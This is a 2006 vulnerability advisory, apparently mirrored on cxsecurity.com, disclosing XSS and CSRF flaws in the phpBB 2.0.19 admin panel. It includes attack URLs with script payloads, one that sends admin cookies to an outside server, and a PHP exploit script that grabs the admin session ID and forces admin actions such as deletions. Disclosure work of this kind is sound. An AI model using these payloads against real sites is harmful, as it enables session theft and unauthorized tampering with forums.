Bug: phpBB 2.0.19 Cross Site Request Forgeries and XSS Admin ( Ascii Version )

Search:
WLB2

phpBB 2.0.19 Cross Site Request Forgeries and XSS Admin

Published
Credit
Risk
2006.02.03
Maksymilian Arciemowicz
Medium
CWE
CVE
Local
Remote
CWE-79
CVE-2006-0437
CVE-2006-0438
Yes
Yes

[phpBB 2.0.19 Cross Site Request Forgeries and XSS Admin]

Author: Maksymilian Arciemowicz
Date: 3.2.2006
CVE-2006-0437 for the XSS issues
CVE-2006-0438 for the CSRF issues


- --- 0.Description ---
phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package. phpBB has a

user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP

server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal

free community solution for all web sites.
Contact with author http://www.phpbb.com/about.php.

- --- 1. XSS admin ---
In admin/admin_smilies.php you can create, modifcate smille. So nothing special but phpBB don't check what is going to
db.

case savenew

- -448-473---
$smile_code = ( isset($HTTP_POST_VARS['smile_code']) ) ? $HTTP_POST_VARS['smile_code'] :

$HTTP_GET_VARS['smile_code'];
$smile_url = ( isset($HTTP_POST_VARS['smile_url']) ) ? $HTTP_POST_VARS['smile_url'] :

$HTTP_GET_VARS['smile_url'];
$smile_url = phpbb_ltrim(basename($smile_url), "'");
$smile_emotion = ( isset($HTTP_POST_VARS['smile_emotion']) ) ?

$HTTP_POST_VARS['smile_emotion'] : $HTTP_GET_VARS['smile_emotion'];
$smile_code = trim($smile_code);
$smile_url = trim($smile_url);
$smile_emotion = trim($smile_emotion);

// If no code was entered complain ...
if ($smile_code == '' || $smile_url == '')
{
message_die(GENERAL_MESSAGE, $lang['Fields_empty']);
}

//
// Convert < and > to proper htmlentities for parsing.
//
$smile_code = str_replace('<', '&lt;', $smile_code);
$smile_code = str_replace('>', '&gt;', $smile_code);

//
// Save the data to the smiley table.
//
$sql = "INSERT INTO " . SMILIES_TABLE . " (code, smile_url, emoticon)
VALUES ('" . str_replace("\'", "''", $smile_code) . "', '" .
str_replace("\'", "''",

$smile_url) . "', '" . str_replace("\'", "''", $smile_emotion) . "')";
$result = $db->sql_query($sql);
- -448-473---

Only "<" and ">" are restricted.

http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=:x:&smile_url=icon_mrgreen.gif&smile_emo
tion=c" onmouseover="alert('cxsecurity.Com')" &sid=SIDofADMIN

http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=:h:&smile_url=icon_mrgreen.gif"%20onmou
seover='alert("cxsecurity.Com")'%20&sid=SIDofADMIN

http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=:q:&smile_url=icon_mrgreen.gif"%20onmou
seover="alert(document.location='http://[SRVER]/cookies?'+document.cookie)"%20&sid=SIDofADMIN

and you have new smile. Ofcourse you can better do exploit. For IE and etc.


- --- 2. Cross Site Request Forgeries ---
phpBB admin in Administration Panel have SID in url. Ok. Example if you want see user profil or split, lock someone

post etc.

Like:
http://[HOST]/[DIR]/admin/admin_users.php?sid=88eafcce6dddcee3fccc08de7ec505d0
http://[HOST]/[DIR]/modcp.php?t=2&mode=split&sid=c1db64124b7ced0668dec5900fed3b35
etc.

If this user have "Link to off-site Avatar" ON or is bbcode (IMG) ON then you can create url to script with
referer for admin.So when admin open profil the url will be executed. Need be referer in request.

Next problem is:

103# if ( !preg_match("#^((ht|f)tp://)([^ \?&=\#\"\n\r\t<]*?(\.(jpg|jpeg|gif|png))$)#is",
$avatar_filename) )

in includes/unsercp_avatar.php.

Why? Because this preg() don't have limit of chars.
In mysql phpbb DB you have (*_users)

user_avatar varchar(100)

only 100 chars will go to db.
So you can post url like

http://[HOST]/[DIR]/script.php/[100 chars].jpg

Sent:
http://[HOST]/[DIR]/script.php/2006020016200602001620060200162006020016200602001620060200162006020016200.jpg

and in db is:
http://[HOST]/[DIR]/script.php/cxsecuritycxsecuritycxsecuritycxsecuritycxsecuritycxsecuritycxsecuritycxsXX

or in bbcode (IMG)

http://[HOST]/[DIR]/script.php/cxsecurity.jpg

Nothing special.. Ok..

You need create new user (nick name can be "FUCKmeADMIN" etc). And upload one script. Doesn't need be in
serverwhere is phpbb.

- -script.php--
<?php
# cxsecurity.Com writed by Maksymilian Arciemowicz
# Example exploit

$operation='http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=try&smile_url=icon_mrgreen.gif&q
uot;%20onmouseover=\'alert("cxsecurity.Com)\'%20'; #
http://[host]/admin/admin_smilies.php?mode=savenew&smile_code=a&smile_url=icon_mrgreen.gif"
onmouseover='alert(document.cookie)'

$sid='';
preg_match('#sid\=?([0-9a-z]*)#i', getenv('HTTP_REFERER'), $sid);

if($sid[1]!=''){
header("Location: ".$operation."&sid=".$sid[1]);
}

?>
- -script.php--

In this script you need give someone operation. I think, can be:

http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=try&smile_url=icon_mrgreen.gif"%20onmou
seover=\'alert("cxsecurity.Com)\'%20
create new smilie.. and all char a, change to image with javascript (XSS).

http://[HOST]/[DIR]/admin/admin_smilies.php?mode=delete&id=63
Delete someone smile.

http://[HOST]/[DIR]/admin/admin_words.php?mode=delete&id=1&sid=c1db64124b7ced0668dec5900fed3b35
Delete word censor.

http://[HOST]/[DIR]/admin/admin_forums.php?mode=forum_order&move=15&f=4
Change position of forum=4.

http://[HOST]/[DIR]/admin/admin_ranks.php?mode=delete&id=4
Delete Rank Administration

http://[HOST]/[DIR]/login.php?logout=true
Logout

etc..

If admin have in url SID and img tag is displaying that this script can get SID form HTTP_REFERER and redirect
tooperation for admin (header("Location...")).
Admin can't see result. This XSS in Point 1 can you used for this trick.

Solution is don't displaying <IMG> tags from user where have you SID in url. And use POST to any operations like
create, remove smilies etc.

- --- 3. Contact ---
Author: Maksymilian Arciemowicz

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version